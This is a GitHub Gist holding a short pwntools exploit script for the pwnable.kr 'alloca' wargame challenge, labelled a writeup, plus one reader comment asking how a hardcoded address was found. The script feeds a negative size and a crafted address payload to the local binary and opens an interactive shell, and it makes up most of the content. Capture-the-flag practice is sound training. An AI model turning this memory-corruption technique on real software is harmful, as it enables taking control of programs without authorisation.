from pwn import *
proc = process('alloca')
proc.sendline('-80')
proc.sendline('134525988'+',,,'+'\xab\x85\x04\x08')
proc.interactive()
Created
January 2, 2017 05:16
-
-
Save parksjin01/88f9215601ef73407906e846d48add4f to your computer and use it in GitHub Desktop.
pwnable.kr alloca(No ASLR) writeup
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
could u tell me how to calc the addr 134525988=0x804b424?in my problem,it cannot access.
i set size -80,try to find a pointer pointing 0x80485ab,but no avaliable place i found.
it is thankful if you can teach me something, here is my emai Mars3.14@foxmail.com